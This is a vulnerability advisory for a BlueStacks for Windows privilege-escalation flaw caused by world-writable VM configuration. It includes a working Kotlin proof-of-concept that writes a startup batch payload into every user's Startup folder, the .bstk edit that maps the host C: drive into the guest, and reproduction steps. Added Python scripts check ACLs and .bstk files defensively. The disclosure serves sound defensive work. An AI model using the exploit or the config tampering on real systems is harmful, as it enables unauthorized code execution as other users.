CVEID: CVE-2024-33352
Bluestacks Advisory ID: pending
Name of the affected product(s) and version(s): BlueStacks for Windows (versions prior to 10.40.1000.502)
Vulnerability type: CWE-552: Files or Directories Accessible to External Parties
PoC Exploit.kt code:
Kotlin:
package mmiszczyk.bluestackshack

import android.util.Log
import java.io.File

// PoC payload dropper. It runs inside the guest Android system and reaches the host
// filesystem through the shared folder that the tampered .bstk maps to the root of C:.
class Exploit {
    private val TAG = "EXPLOIT"
    // Host C:\ as seen from the guest once the SharedFolder hostPath points at "C:\"
    private val C_DRIVE = File("/mnt/windows/BstSharedFolder/")
    private val USERS = File(C_DRIVE, "Users/")

    fun installBackdoor(payload: String) {
        enumerateUsers().forEach { addPayloadToAutorun(it, payload) }
    }

    // The guest cannot tell which host user started BlueStacks, so every profile under
    // C:\Users is tried; well-known non-user entries are skipped.
    fun enumerateUsers(): List<String> {
        return USERS.list()?.filter { it !in listOf("Public", "Default", "All Users", "desktop.ini") } ?: emptyList()
    }

    // Writes payload.bat into the user's Startup folder, which Windows runs at the next logon.
    fun addPayloadToAutorun(user: String, payload: String) {
        val d = File(File(USERS, user), "AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup")
        if (!d.exists() || !d.isDirectory) {
            Log.e(TAG, "Cannot access ${d.absolutePath}; skipping")
            return
        }
        try {
            File(d, "payload.bat").writeText(payload)
        } catch (e: Exception) {
            Log.e(TAG, "Error backdooring user $user")
            Log.e(TAG, e.toString())
            return
        }
        Log.d(TAG, "Successfully backdoored user $user")
    }
}
Summary
BlueStacks is an Android emulator which runs the guest Android system within a virtual machine. Because BlueStacks stores virtual machine configuration files in a world-writeable directory and shares them across different OS users, it is possible for an unprivileged user to backdoor an image that would then gain the code execution capabilities of a privileged user.
Description
BlueStacks configuration is stored globally in the ProgramData directory with the following ACLs:
Code:
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA)
Successfully processed 1 files; Failed processing 0 files
The (F) permission assigned to Everyone means that all users can fully access and modify the contents. This allows modifying both the virtual drives (the storage used by the emulators) and their VirtualBox config files. Editing the former gives the attacker an opportunity to add automatically executed code to the underlying virtual machine, creating a backdoor which will run whenever a legitimate user starts the emulator. Editing the latter allows reconfiguring the shared directory settings to include the entire C drive, allowing the code to escape from VirtualBox into the host operating system.
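A check a defender can run over the output of icacls for the BlueStacks ProgramData directory to flag the kind of permissive entries described above (an added example, not part of the advisory): it parses each ACE and reports any broad principal, such as Everyone or BUILTIN\Users, that holds a write-capable right. The sample output is constructed, modelled on the listing above plus the Everyone:(F) entry the text refers to, and the audited path is assumed to contain no spaces.

```python
import re

# Constructed sample of "icacls C:\ProgramData\BlueStacks_nxt" output, modelled on the
# advisory's listing plus the Everyone:(F) entry its text describes; not a real capture.
SAMPLE_ICACLS = r"""C:\ProgramData\BlueStacks_nxt Everyone:(OI)(CI)(F)
                              NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                              BUILTIN\Administrators:(I)(OI)(CI)(F)
                              CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                              BUILTIN\Users:(I)(OI)(CI)(RX)
                              BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA)

Successfully processed 1 files; Failed processing 0 files
"""

# Principals that amount to "any local user"; a write right here makes the data shared state.
BROAD_PRINCIPALS = {"Everyone", "BUILTIN\\Users",
                    "NT AUTHORITY\\Authenticated Users", "NT AUTHORITY\\INTERACTIVE"}
# icacls simple and specific rights that allow creating, changing or deleting content.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WA", "WEA", "D", "DC", "WDAC", "WO"}
# Inheritance and propagation flags; they grant nothing by themselves.
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}

# One ACE: optional "DOMAIN\" prefix, principal (may contain spaces), then "(..)(..)" rights.
# icacls prints the audited path before the first ACE; it is assumed to contain no spaces.
ACE_RE = re.compile(r"(?:^|\s)((?:[A-Z][A-Z ]*\\)?[A-Za-z][A-Za-z0-9 _.\-]*?):((?:\([A-Z,]+\))+)\s*$")

def parse_icacls(output):
    """Yield (principal, set of rights) for every ACE line in icacls output."""
    for line in output.splitlines():
        m = ACE_RE.search(line)
        if not m:
            continue  # blank line or the "Successfully processed" summary
        rights = set()
        for group in re.findall(r"\(([^)]+)\)", m.group(2)):
            rights.update(t for t in group.split(",") if t not in INHERIT_FLAGS)
        yield m.group(1), rights

def overbroad_entries(output):
    """Return (principal, sorted rights) for ACEs giving a broad principal write access."""
    return [(p, sorted(r)) for p, r in parse_icacls(output)
            if p in BROAD_PRINCIPALS and r & WRITE_RIGHTS]

if __name__ == "__main__":
    for principal, rights in overbroad_entries(SAMPLE_ICACLS):
        print(f"world-writable ACE on BlueStacks data: {principal} -> {','.join(rights)}")
```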
To enable a virtual machine escape, the attacker would modify the file C:\ProgramData\BlueStacks_nxt\Engine\Nougat32\Nougat32.bstk (or the equivalent file for the specific virtual machine used by the victim's BlueStacks version; different BlueStacks versions can use other Android VMs), changing the line
Code:
<SharedFolder name="BstSharedFolder" hostPath="C:\ProgramData\BlueStacks_nxt\Engine\UserData\SharedFolder" writable="true" autoMount="false"/>
to
Code:
<SharedFolder name="BstSharedFolder" hostPath="C:\" writable="true" autoMount="false"/>
which will allow full access to the Windows filesystem (with restrictions depending on the access level of the user running BlueStacks) through /mnt/windows/BstSharedFolder.
After configuring the shared folders to enable the VM escape, the attacker needs to modify the virtual drive's filesystem to add code that will be executed when the drive is run by the privileged user. There are multiple ways of doing this, but the most straightforward one, demonstrated in the PoC, is to install an application that starts automatically by means of a BOOT_COMPLETED broadcast receiver.
The final step of the exploitation is performing the escape. With access to the host OS filesystem, it can be achieved by adding an executable file to the current user's
AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup. While the application has no way of knowing who the current user is, it can simply enumerate the subdirectories in C:\Users and attempt writing to all of them.
Reproduction
- Set up attacker and victim accounts, preferably making the attacker unprivileged and the victim an administrator
- Victim: install the vulnerable version of BlueStacks
- Attacker: modify Nougat32.bstk to give Android access to the C drive
- Attacker: run the Android system and install a malicious application on it
- Victim: run BlueStacks, causing the malicious application to drop its payload in your startup directory
- Victim: reboot the machine and log into your account again
- The startup payload should be executed with your privileges
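A defender-side integrity check for the .bstk tampering described in the Description (an added example, not part of the advisory or its PoC): it parses the VirtualBox-style machine XML and flags any SharedFolder whose hostPath lies outside the BlueStacks engine's own shared-folder directory. The XML wrapper around the two SharedFolder lines quoted above is constructed here; a real .bstk is a complete VirtualBox machine definition, and the check matches on the local tag name so a namespaced file is handled too.

```python
import ntpath
import xml.etree.ElementTree as ET

# Host directory BlueStacks is expected to export to the guest (path taken from the advisory).
EXPECTED_ROOT = r"C:\ProgramData\BlueStacks_nxt\Engine\UserData\SharedFolder"

def bstk_fragment(shared_folder_line):
    """Wrap one <SharedFolder/> line in a constructed, minimal VirtualBox-style body.
    A real .bstk carries a full machine definition; only this element matters here."""
    return ("<VirtualBox><Machine><Hardware><SharedFolders>" + shared_folder_line
            + "</SharedFolders></Hardware></Machine></VirtualBox>")

# The two lines quoted in the advisory: the shipped setting and the tampered one.
ORIGINAL = bstk_fragment(r'<SharedFolder name="BstSharedFolder" hostPath="C:\ProgramData\BlueStacks_nxt\Engine\UserData\SharedFolder" writable="true" autoMount="false"/>')
TAMPERED = bstk_fragment(r'<SharedFolder name="BstSharedFolder" hostPath="C:\" writable="true" autoMount="false"/>')

def _under(path, root):
    """True if path equals root or lies inside it, using Windows path rules on any host."""
    p = ntpath.normcase(ntpath.normpath(path))
    r = ntpath.normcase(ntpath.normpath(root))
    return p == r or p.startswith(r.rstrip("\\") + "\\")

def unexpected_shared_folders(bstk_xml, allowed_root=EXPECTED_ROOT):
    """Return (name, hostPath, writable) for every SharedFolder that exports anything
    outside allowed_root, such as the drive root used in the advisory's VM escape."""
    findings = []
    for el in ET.fromstring(bstk_xml).iter():
        # Compare the local name so a default xmlns on the root element does not hide it.
        if el.tag.rsplit("}", 1)[-1] != "SharedFolder":
            continue
        host = el.get("hostPath", "")
        if not _under(host, allowed_root):
            findings.append((el.get("name"), host, el.get("writable") == "true"))
    return findings

if __name__ == "__main__":
    for name, host, writable in unexpected_shared_folders(TAMPERED):
        print(f"SharedFolder {name!r} exports {host} (writable={writable}), outside {EXPECTED_ROOT}")
```

Run against the real Nougat32.bstk by reading the file and passing its text to unexpected_shared_folders; an empty result means every export still points inside the engine directory.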